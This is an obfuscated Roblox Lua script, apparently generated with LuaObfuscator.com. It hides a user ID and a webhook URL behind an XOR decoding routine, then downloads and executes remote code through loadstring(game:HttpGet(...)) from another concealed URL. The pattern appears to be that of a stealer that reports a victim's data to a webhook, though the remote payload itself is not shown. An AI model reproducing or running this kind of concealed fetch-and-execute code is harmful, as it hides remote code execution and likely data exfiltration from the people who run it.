--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(2 -1) + 0 + 0, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (379 -(104 + 274)))),v1(v2(v9,(1 -(0 -0)) + ((v11-((1 -0) + 0 + 0))% #v9),(1 -0) + ((v11-((149 -(106 + 41)) -1))% #v9) + (336 -(102 + 233)))))%(201 + 55)));end return v5(v10);end _G.UserID=(1300635259 -840368007) -((1030 -(367 + 466)) + (20 -11));_G.WebHook=v7("\62\178\224\165\37\252\187\250\50\175\231\182\57\180\240\251\53\169\249\250\55\182\253\250\33\163\246\189\57\169\255\166\121\247\164\227\100\241\161\236\97\246\161\227\103\246\161\224\111\243\167\237\121\170\166\164\38\182\205\227\32\148\166\184\23\151\164\155\100\133\253\167\58\174\203\226\39\179\219\148\58\254\236\226\48\172\195\164\24\130\164\225\30\143\161\157\31\245\254\146\32\159\194\157\23\247\161\182\111\151\206\159\63\132\164\143\46\130\221\191\28","\86\198\148\213");loadstring(game:HttpGet(v7("\137\109\173\63\80\187\251\206\107\184\56\13\230\189\149\113\172\45\86\242\177\147\122\182\33\87\228\186\149\55\186\32\78\174\135\136\117\188\33\64\228\135\130\107\176\63\87\242\251\177\106\161\28\64\243\189\145\109\170\97\111\244\181\206\116\184\38\77\174\132\146\97\152\58\87\238\178\128\107\180\97\87\243\161\132","\225\25\217\79\35\129\212")))();
